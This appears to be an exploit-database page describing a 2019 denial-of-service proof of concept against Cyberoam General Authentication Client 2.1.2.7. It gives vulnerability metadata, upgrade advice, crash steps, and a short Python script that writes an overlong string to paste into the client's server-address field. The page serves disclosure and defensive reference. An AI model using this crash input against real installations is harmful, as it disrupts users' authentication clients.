header-logo
Suggest Exploit
vendor:
Cyberoam General Authentication Client
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Cyberoam General Authentication Client
Affected Version From: 2.1.2.7
Affected Version To: 2.1.2.7
Patch Exists: YES
Related CWE: N/A
CPE: a:cyberoam:cyberoam_general_authentication_client
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2019

Cyberoam General Authentication Client 2.1.2.7 – Denial of Service (PoC)

A denial of service vulnerability exists in Cyberoam General Authentication Client 2.1.2.7 when a maliciously crafted server address is used. An attacker can leverage this vulnerability to crash the application, resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of Cyberoam General Authentication Client.
Source

Exploit-DB raw data:

#Exploit Title: Cyberoam General Authentication Client 2.1.2.7 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/Cyberoam%20General%20Authentication%20Client%202.1.2.7.zip
#Tested Version: 2.1.2.7
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: cgac_2.1.2.7.py
#2.- Open cgac_2.1.2.7.txt and copy content to clipboard
#3.- Open Cyberoam General Authentication Client
#4.- In "Server Address" field paste Clipboard
#5.- Click on "Test"
#6.- Crashed! 

cod = "\x41" * 256

f = open('cgac_2.1.2.7.txt', 'w')
f.write(cod)
f.close()